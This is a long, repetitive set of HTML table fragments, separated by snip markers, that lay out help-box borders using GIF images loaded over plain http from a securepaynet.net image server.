<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
